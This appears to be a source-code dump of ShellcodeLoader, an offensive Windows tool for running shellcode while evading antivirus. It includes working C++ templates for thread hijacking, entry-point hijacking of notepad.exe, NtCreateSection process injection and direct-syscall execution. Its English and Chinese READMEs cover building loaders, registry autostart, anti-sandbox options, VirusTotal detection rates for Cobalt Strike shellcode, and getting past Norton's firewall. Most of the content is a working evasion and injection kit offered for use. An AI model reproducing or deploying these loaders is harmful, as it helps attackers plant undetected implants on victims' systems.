45 | GetThreadContext(threadHijacked, &context);
46 | #ifdef _M_X64
47 | context.Rip = (DWORD_PTR)remoteBuffer;
48 | #else
49 | context.Eip = (DWORD_PTR)remoteBuffer;
50 | #endif // x64
51 | SetThreadContext(threadHijacked, &context);
52 | ResumeThread(threadHijacked);
53 | return 0;
54 | }
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | 头文件
23 |
24 |
25 | 头文件
26 |
27 |
28 | 头文件
29 |
30 |
31 | 头文件
32 |
33 |
34 | 头文件
35 |
36 |
37 |
38 |
39 | 源文件
40 |
41 |
42 | 源文件
43 |
44 |
45 | 源文件
46 |
47 |
48 |
49 |
50 | 资源文件
51 |
52 |
53 |
54 |
55 | 资源文件
56 |
57 |
58 |
59 |
60 | 资源文件
61 |
62 |
63 |
--------------------------------------------------------------------------------
/plug/OEP Hiijack-Inject Load/OEP.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | #include
3 | #pragma comment(lib, "ntdll")
4 |
5 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
6 | {
7 | //1.Get shellcode and shellcodesize from Resource by ID
8 | UINT shellcodeSize = 0;
9 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
10 | if (shellcode == nullptr)
11 | {
12 | return 0;
13 | }
14 | //2.Execute shellcode
15 | STARTUPINFOA si;
16 | si = {};
17 | PROCESS_INFORMATION pi = {};
18 | PROCESS_BASIC_INFORMATION pbi = {};
19 | #ifdef _M_X64
20 | DWORD returnLength = 0;
21 | CreateProcessA(0, (LPSTR)"c:\\windows\\notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
22 | // get target image PEB address and pointer to image base
23 | NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLength);
24 | LONGLONG imageBaseOffset = (LONGLONG)pbi.PebBaseAddress + 16;
25 | // get target process image base address
26 | LPVOID imageBase = 0;
27 | ReadProcessMemory(pi.hProcess, (LPCVOID)imageBaseOffset, &imageBase, 8, NULL);
28 | // read target process image headers
29 | BYTE headersBuffer[4096] = {};
30 | ReadProcessMemory(pi.hProcess, (LPCVOID)imageBase, headersBuffer, 4096, NULL);
31 | // get AddressOfEntryPoint
32 | PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)headersBuffer;
33 | PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
34 | LPVOID codeEntry = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (LONGLONG)imageBase);
35 | #else
36 | DWORD returnLength = 0;
37 | CreateProcessA(0, (LPSTR)"c:\\windows\\system32\\notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
38 | // get target image PEB address and pointer to image base
39 | NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLength);
40 | DWORD imageBaseOffset = (DWORD)pbi.PebBaseAddress + 8;
41 | // get target process image base address
42 | LPVOID imageBase = 0;
43 | ReadProcessMemory(pi.hProcess, (LPCVOID)imageBaseOffset, &imageBase, 4, NULL);
44 | // read target process image headers
45 | BYTE headersBuffer[4096] = {};
46 | ReadProcessMemory(pi.hProcess, (LPCVOID)imageBase, headersBuffer, 4096, NULL);
47 | // get AddressOfEntryPoint
48 | PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)headersBuffer;
49 | PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
50 | LPVOID codeEntry = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD)imageBase);
51 | #endif // x64
52 | // write shellcode to image entry point and execute it
53 | WriteProcessMemory(pi.hProcess, codeEntry, shellcode, shellcodeSize, NULL);
54 | ResumeThread(pi.hThread);
55 | return 0;
56 | }
--------------------------------------------------------------------------------
/plug/NtCreateSection-Inject Load/NtCreateSection.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | #include
3 |
4 | typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID;
5 | using pNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
6 | using pNtMapViewOfSection = NTSTATUS(NTAPI*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect);
7 | using pRtlCreateUserThread = NTSTATUS(NTAPI*)(IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientID);
8 |
9 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
10 | {
11 | //0.Get functions
12 | pNtCreateSection fNtCreateSection = (pNtCreateSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtCreateSection"));
13 | pNtMapViewOfSection fNtMapViewOfSection = (pNtMapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtMapViewOfSection"));
14 | pRtlCreateUserThread fRtlCreateUserThread = (pRtlCreateUserThread)(GetProcAddress(GetModuleHandleA("ntdll"), "RtlCreateUserThread"));
15 | //1.Get shellcode and shellcodesize from Resource by ID
16 | UINT shellcodeSize = 0;
17 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
18 | if (shellcode == nullptr)
19 | {
20 | return 0;
21 | }
22 | //2.Get shellcode memory
23 | SIZE_T size = shellcodeSize;
24 | LARGE_INTEGER sectionSize = { size };
25 | HANDLE sectionHandle = NULL;
26 | PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;
27 | fNtCreateSection(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
28 | fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE);
29 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
30 | PROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };
31 | if (Process32First(snapshot, &processEntry))
32 | {
33 | while (_wcsicmp(processEntry.szExeFile, L"notepad.exe") != 0)
34 | {
35 | Process32Next(snapshot, &processEntry);
36 | }
37 | }
38 | DWORD targetPID = processEntry.th32ProcessID;
39 | HANDLE targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, targetPID);
40 | fNtMapViewOfSection(sectionHandle, targetHandle, &remoteSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READ);
41 | memcpy(localSectionAddress, shellcode, shellcodeSize);
42 | //3.Execute shellcode
43 | HANDLE targetThreadHandle = NULL;
44 | fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, remoteSectionAddress, NULL, &targetThreadHandle, NULL);
45 | return 0;
46 | }
--------------------------------------------------------------------------------
/readme_cn.md:
--------------------------------------------------------------------------------
1 | # ShellcodeLoader
2 |
3 | Language: [English](Readme.md)
4 |
5 | Windows平台的shellcode免杀加载器。
6 |
7 | ## 功能特点
8 |
9 | 1. 自带多种加载方式。32位自带13种加载方式,64位自带12种加载方式。
10 |
11 | 2. 支持拓展。如果发现新的利用方式,按指定方式开发模板即可。
12 |
13 | 3. shellcode自动随机加密。使用时间为种子,生成128位密钥进行加密,相同shellcode出来的加载器的md5也不相同。
14 |
15 |
16 |
17 | ## 编译环境和方法
18 |
19 | 环境:生成器使用MFC实现UI,生成器和加载器模板均使用C++开发,VS2015静态编译。
20 |
21 | 方法:使用VS2015打开项目的解决方案(.sln),再进行编译即可。你也可以从[realse](https://github.com/knownsec/shellcodeloader/releases/)下载成品。
22 |
23 |
24 |
25 | ## 文件组成
26 |
27 | 本工具由生成器(shellcodeLoader.exe),和众多加载器模板组成。不同的加载器模板需放入对应位数的目录。并最终放入生成器同目录下的DATA目录。
28 |
29 | 
30 |
31 |
32 |
33 | ## 使用方法
34 |
35 | 1. **打开生成器**
36 |
37 | 
38 |
39 |
40 |
41 | 2. **将想要加载的shellcode源文件(.bin)拖入该窗口**
42 |
43 | 
44 |
45 |
46 |
47 | 3. **勾选加载器的运行位数,并选择你需要的配置选项,是否需要自启动(自带方式皆为注册表方式自启动),是否需要反沙箱(64位下多数杀软不需要该选项即可免杀)**
48 |
49 |
50 |
51 | 4. **选择你想要的加载方式,不同位数下的加载方式会有不同,其取决于DATA目录下对应的加载器模板。**
52 |
53 | 
54 |
55 |
56 |
57 | 5. **点击生成,则会在桌面生成最终的加载器。**
58 |
59 | 
60 |
61 | ## 拓展方法
62 |
63 | 1. 在你新的模板源文件前包含public.hpp.
64 |
65 |
66 |
67 | 2. 调用GetShellcodeFromRes()函数获取shellcode信息,注意100不可更改,除非你改了生成器中的资源序号。
68 |
69 | 
70 |
71 | 其返回shellcode的数据指针,并且,shellcodeSize就是shellcode的大小。多数情况下,这一步是不需要进行更改的,你可以在获取shellcode之后做任何事。
72 |
73 |
74 |
75 | 3. 按照你需要的方法加载shellcode,完成后进行编译(PS:请确保你进行了静态编译,且取消了调试符号链接).
76 |
77 | 
78 |
79 |
80 |
81 | 4. 将编译出来的文件进行指定命名,这里的命名就是UI上最终现实的加载方式名称,并将其后缀改为DAT,放入指DATA目录下指定位数的目录中,生成器会自动获取该加载方式。
82 |
83 | 
84 |
85 |
86 |
87 | ### 关于public.hpp
88 |
89 | public.hpp源码中含有必要的注释。如果你想要其他的方式进行反沙箱,你可以更改antisandbox中的函数;如果你想要其他方式自启动,你可以更改autostart函数中的内容。其他函数体的内容多数情况下是不需要更改的。
90 |
91 |
92 |
93 | ## 使用效果
94 |
95 | VT检测效果,均以CS原始shellcode,并不勾选反沙箱为例:
96 |
97 | | 加载方式 | 未绕过率 |
98 | | ------------------------ | -------- |
99 | | CreateThreadpoolWait加载 | 3/72 |
100 | | Fiber加载 | 4/72 |
101 | | NtTestAlert加载 | 5/70 |
102 | | SEH异常加载 | 2/72 |
103 | | TLS回调加载 | 28/71 |
104 | | 动态加载 | 1/72 |
105 | | 动态加载plus | 28/71 |
106 | | 系统call加载 | 1/69 |
107 | | APC注入加载 | 6/72 |
108 | | Early Brid APC注入加载 | 4/72 |
109 | | NtCreateSection注入加载 | 2/71 |
110 | | 入口点劫持注入加载 | 3/72 |
111 | | 线程劫持注入加载 | 6/72 |
112 |
113 | 在动态加载方式勾选反沙箱之后,结果如下:
114 |
115 | 
116 |
117 |
118 |
119 | 使用该加载器bypass诺顿的智能防火墙出网拦截,并上线:
120 |
121 | 
122 |
123 |
124 |
125 | ## 参考
126 |
127 | - [反沙箱](https://0xpat.github.io/Malware_development_part_2/)
128 | - [RC4算法](https://www.52pojie.cn/thread-800115-1-1.html)
129 | - [CreateThreadpoolWait加载](https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait)
130 | - [Fiber加载](https://www.ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber)
131 | - [NtTestAlert加载](https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert)
132 | - [SEH异常加载](https://idiotc4t.com/code-and-dll-process-injection/seh-code-execute)
133 | - [TLS回调加载](https://idiotc4t.com/code-and-dll-process-injection/tls-code-execute)
134 | - [系统call加载](https://modexp.wordpress.com/2020/06/01/syscalls-disassembler/)
135 | - [APC注入](https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection)
136 | - [Early Bird APC注入](https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection)
137 | - [Early Brid APC注入原理](https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection)
138 | - [NtCreateSection注入](https://www.ired.team/offensive-security/code-injection-process-injection/ntcreatesection-+-ntmapviewofsection-code-injection)
139 | - [入口点劫持注入](https://www.ired.team/offensive-security/code-injection-process-injection/addressofentrypoint-code-injection-without-virtualallocex-rwx)
140 | - [线程劫持注入](https://idiotc4t.com/code-and-dll-process-injection/setcontext-hijack-thread)
141 | - 《加密与解密4》
142 |
--------------------------------------------------------------------------------
/plug/Syscall Load/Syscall.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
4 |
5 | ULONG64 rva2ofs(PIMAGE_NT_HEADERS nt, DWORD rva) {
6 | PIMAGE_SECTION_HEADER sh;
7 | int i;
8 |
9 | if (rva == 0) return -1;
10 |
11 | sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
12 | nt->FileHeader.SizeOfOptionalHeader);
13 |
14 | for (i = nt->FileHeader.NumberOfSections - 1; i >= 0; i--) {
15 | if (sh[i].VirtualAddress <= rva &&
16 | rva <= (DWORD)sh[i].VirtualAddress + sh[i].SizeOfRawData)
17 | {
18 | return sh[i].PointerToRawData + rva - sh[i].VirtualAddress;
19 | }
20 | }
21 | return -1;
22 | }
23 |
24 | LPVOID GetProcAddress2(LPBYTE hModule, LPCSTR lpProcName)
25 | {
26 | PIMAGE_DOS_HEADER dos;
27 | PIMAGE_NT_HEADERS nt;
28 | PIMAGE_DATA_DIRECTORY dir;
29 | PIMAGE_EXPORT_DIRECTORY exp;
30 | DWORD rva, ofs, cnt;
31 | PCHAR str;
32 | PDWORD adr, sym;
33 | PWORD ord;
34 | if (hModule == NULL || lpProcName == NULL) return NULL;
35 | dos = (PIMAGE_DOS_HEADER)hModule;
36 | nt = (PIMAGE_NT_HEADERS)(hModule + dos->e_lfanew);
37 | dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
38 | // no exports? exit
39 | rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
40 | if (rva == 0) return NULL;
41 | ofs = rva2ofs(nt, rva);
42 | if (ofs == -1) return NULL;
43 | // no exported symbols? exit
44 | exp = (PIMAGE_EXPORT_DIRECTORY)(ofs + hModule);
45 | cnt = exp->NumberOfNames;
46 | if (cnt == 0) return NULL;
47 | // read the array containing address of api names
48 | ofs = rva2ofs(nt, exp->AddressOfNames);
49 | if (ofs == -1) return NULL;
50 | sym = (PDWORD)(ofs + hModule);
51 | // read the array containing address of api
52 | ofs = rva2ofs(nt, exp->AddressOfFunctions);
53 | if (ofs == -1) return NULL;
54 | adr = (PDWORD)(ofs + hModule);
55 | // read the array containing list of ordinals
56 | ofs = rva2ofs(nt, exp->AddressOfNameOrdinals);
57 | if (ofs == -1) return NULL;
58 | ord = (PWORD)(ofs + hModule);
59 | // scan symbol array for api string
60 | do {
61 | str = (PCHAR)(rva2ofs(nt, sym[cnt - 1]) + hModule);
62 | // found it?
63 | if (strcmp(str, lpProcName) == 0) {
64 | // return the address
65 | return (LPVOID)(rva2ofs(nt, adr[ord[cnt - 1]]) + hModule);
66 | }
67 | } while (--cnt);
68 | return NULL;
69 | }
70 |
71 | #define NTDLL_PATH "%SystemRoot%\\system32\\NTDLL.dll"
72 |
73 | LPVOID GetSyscallStub(LPCSTR lpSyscallName)
74 | {
75 | HANDLE file = NULL, map = NULL;
76 | LPBYTE mem = NULL;
77 | LPVOID cs = NULL;
78 | PIMAGE_DOS_HEADER dos;
79 | PIMAGE_NT_HEADERS nt;
80 | PIMAGE_DATA_DIRECTORY dir;
81 | PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
82 | ULONG64 ofs, start = 0, end = 0, addr;
83 | SIZE_T len;
84 | DWORD i, rva;
85 | CHAR path[MAX_PATH];
86 | ExpandEnvironmentStringsA(NTDLL_PATH, path, MAX_PATH);
87 | // open file
88 | file = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
89 | if (file == INVALID_HANDLE_VALUE) { goto cleanup; }
90 | // create mapping
91 | map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
92 | if (map == NULL) { goto cleanup; }
93 | // create view
94 | mem = (LPBYTE)MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
95 | if (mem == NULL) { goto cleanup; }
96 | // try resolve address of system call
97 | addr = (ULONG64)GetProcAddress2(mem, lpSyscallName);
98 | if (addr == 0) { goto cleanup; }
99 | dos = (PIMAGE_DOS_HEADER)mem;
100 | nt = (PIMAGE_NT_HEADERS)((PBYTE)mem + dos->e_lfanew);
101 | dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
102 | // no exception directory? exit
103 | rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
104 | if (rva == 0) { goto cleanup; }
105 | ofs = rva2ofs(nt, rva);
106 | if (ofs == -1) { goto cleanup; }
107 | rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);
108 | // for each runtime function (there might be a better way??)
109 | for (i = 0; rf[i].BeginAddress != 0; i++) {
110 | // is it our system call?
111 | start = rva2ofs(nt, rf[i].BeginAddress) + (ULONG64)mem;
112 | if (start == addr) {
113 | // save the end and calculate length
114 | end = rva2ofs(nt, rf[i].EndAddress) + (ULONG64)mem;
115 | len = (SIZE_T)(end - start);
116 | // allocate RWX memory
117 | cs = VirtualAlloc(NULL, len,
118 | MEM_COMMIT | MEM_RESERVE,
119 | PAGE_EXECUTE_READWRITE);
120 | if (cs != NULL) {
121 | // copy system call code stub to memory
122 | CopyMemory(cs, (const void*)start, len);
123 | }
124 | break;
125 | }
126 | }
127 | cleanup:
128 | if (mem != NULL) UnmapViewOfFile(mem);
129 | if (map != NULL) CloseHandle(map);
130 | if (file != NULL) CloseHandle(file);
131 | // return pointer to code stub or NULL
132 | return cs;
133 | }
134 |
135 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
136 | {
137 | //0.Get functions
138 | pNtAllocateVirtualMemory fnNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetSyscallStub("NtAllocateVirtualMemory");
139 | //1.Get shellcode and shellcodesize from Resource by ID
140 | UINT shellcodeSize = 0;
141 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
142 | if (shellcode == nullptr)
143 | {
144 | return 0;
145 | }
146 | //2.Get shellcode memory
147 | LPVOID Memory = NULL;
148 | SIZE_T uSize = shellcodeSize;
149 | HANDLE hProcess = GetCurrentProcess();
150 | NTSTATUS status = fnNtAllocateVirtualMemory(hProcess, &Memory, 0, &uSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
151 | if (status != 0)
152 | {
153 | return 0;
154 | }
155 | memcpy(Memory, shellcode, shellcodeSize);
156 | //3.Execute shellcode
157 | ((void(*)())Memory)();
158 | return 0;
159 | }
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | # ShellcodeLoader
2 |
3 | 语言: [中文](readme_cn.md)
4 |
5 | ShellcodeLoader of windows can bypass AV.
6 |
7 | ## Features
8 |
9 | 1. It has many loading modes. There are 13 loading modes in 32 bits and 12 loading modes in 64 bits.
10 |
11 | 2. Support development. If a new attack means is found, you can develop template according to the specified method.
12 |
13 | 3. Shellcode is automatically encrypted.The md5 of loaders that come from the same shellcode are different,because the generator uses time as seed to randomly generate 128-bit keys for encryption.
14 |
15 |
16 |
17 | ## To do list
18 |
19 | Environment: The generator uses MFC to implement UI, the generator and loader templates are developed with C + +, and statically compiled by VS2015.
20 |
21 | Methods: Use vs2015 to open the project solution (. sln), and then compile.Of course,You can download the product from [realse](https://github.com/knownsec/shellcodeloader/releases/) .
22 |
23 |
24 |
25 | ## Files
26 |
27 | The tool is composed of a generator (Shellcodeloader.exe) and numerous loader templates. Different loader templates need to be placed in the corresponding arch of directories. And finally put into the DATA folder under the same directory of the generator.
28 |
29 |
30 |
31 |
32 |
33 | ## How to use
34 |
35 | 1. **Open the generator(shellcode.exe)**
36 |
37 | 
38 |
39 |
40 |
41 | 2. **Drag your raw shellcode(.bin) into the generator**
42 |
43 | 
44 |
45 |
46 |
47 | 3. **Choose the loader's arch (default x86),And select the configuration options you want, whether you want to autostart(which comes with a registry), and whether you want to antisandbox(This option is not required for most 64-bit loaders)**
48 |
49 |
50 |
51 | 4. **Choose how you want to load it. Different loading methos depending on the loading template in the DATA floder.**
52 |
53 | 
54 |
55 |
56 |
57 | 5. **Click Generate and the final loader will be generated on the desktop. **
58 |
59 | 
60 |
61 | ## How to expand
62 |
63 | 1. include public.hpp in your cpp.
64 |
65 |
66 |
67 | 2. Call the GetShellcodeFromRes() function to get shellcode,the number 100 is immutable,unless you change the resourceID in generator.
68 |
69 | 
70 |
71 | It will return the pointer of shellcode in resource,and shellcodesize is size of sehllcode.In most cases, this step doesn't need to be changed, you can do anything after you get the shellcode.
72 |
73 |
74 |
75 | 3. Loading shellcode in your method ,and compile(PS:**Make sure you compile statically and cancel the debug symbolic link**)
76 |
77 | 
78 |
79 |
80 |
81 | 4. Use method name your template,this name will be loading method's name on UI,and change its format to "DAT",,Put it in correct arch in DATA folder ,The generator will automatically get the loading method.
82 |
83 | 
84 |
85 |
86 |
87 | ### About public.hpp
88 |
89 | public.hpp contains the necessary comments.If you want other ways of anti sandbox, you can change the content of anti sandbox function; if you want other ways of self starting, you can change the content of autostart function. In most cases, the contents of other function bodies do not need to be changed.
90 |
91 |
92 |
93 | ## Result
94 |
95 | Virus total detection results,based on Cobalt Strike original shellcode without anti-sandbox option as an example:
96 |
97 | | Loading methods | Detected |
98 | | --------------------------- | -------- |
99 | | CreateThreadpoolWait Load | 3/72 |
100 | | Fiber Load | 4/72 |
101 | | NtTestAlert Load | 5/70 |
102 | | SEH Except Load | 2/72 |
103 | | TLS CallBack Load | 28/71 |
104 | | Dynamic Load | 1/72 |
105 | | Dynamic Load plus | 28/71 |
106 | | Syscall Load | 1/69 |
107 | | APC-Inject Load | 6/72 |
108 | | Early Brid APC-Inject Load | 4/72 |
109 | | NtCreateSection-Inject Load | 2/71 |
110 | | OEP Hiijack-Inject Load | 3/72 |
111 | | Thread Hiijack-Inject Load | 6/72 |
112 |
113 | After clieck the anti-sandbox option in the dynamic loading mode, the results are as follows:
114 |
115 | 
116 |
117 |
118 |
119 | Bypass network interception of norton's smart firewall,and online by this tool.
120 |
121 | 
122 |
123 |
124 |
125 | ## Ref
126 |
127 | - [Antisandbox](https://0xpat.github.io/Malware_development_part_2/)
128 | - [RC4 Crypt](https://www.52pojie.cn/thread-800115-1-1.html)
129 | - [CreateThreadpoolWait Load](https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait)
130 | - [Fiber Load](https://www.ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber)
131 | - [NtTestAlert Load](https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert)
132 | - [SEH except Load](https://idiotc4t.com/code-and-dll-process-injection/seh-code-execute)
133 | - [TLS callback Load](https://idiotc4t.com/code-and-dll-process-injection/tls-code-execute)
134 | - [syscall Load](https://modexp.wordpress.com/2020/06/01/syscalls-disassembler/)
135 | - [APC Inject Load](https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection)
136 | - [Early Bird APC Inject Load](https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection)
137 | - [Early Brid APC Inject](https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection)
138 | - [NtCreateSection Inject Load](https://www.ired.team/offensive-security/code-injection-process-injection/ntcreatesection-+-ntmapviewofsection-code-injection)
139 | - [OEP Hiijack Hiijack Inject Load](https://www.ired.team/offensive-security/code-injection-process-injection/addressofentrypoint-code-injection-without-virtualallocex-rwx)
140 | - [Thread Hiijack Inject Load](https://idiotc4t.com/code-and-dll-process-injection/setcontext-hijack-thread)
141 | - 《加密与解密4》
142 |
--------------------------------------------------------------------------------
/plug/Syscall Load/Syscall Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}
23 | Win32Proj
24 | SyscallLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 | $(SolutionDir)\$(Configuration)\DATA\64
84 | .DAT
85 |
86 |
87 |
88 |
89 |
90 | Level3
91 | Disabled
92 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
93 |
94 |
95 | Windows
96 | true
97 |
98 |
99 |
100 |
101 |
102 |
103 | Level3
104 | Disabled
105 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
106 |
107 |
108 | Windows
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
121 |
122 |
123 | Windows
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 | Level3
132 |
133 |
134 | MaxSpeed
135 | true
136 | true
137 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
138 | MultiThreaded
139 |
140 |
141 | Windows
142 | true
143 | true
144 | false
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
--------------------------------------------------------------------------------
/plug/Fiber Load/Fiber Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}
23 | Win32Proj
24 | FiberLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
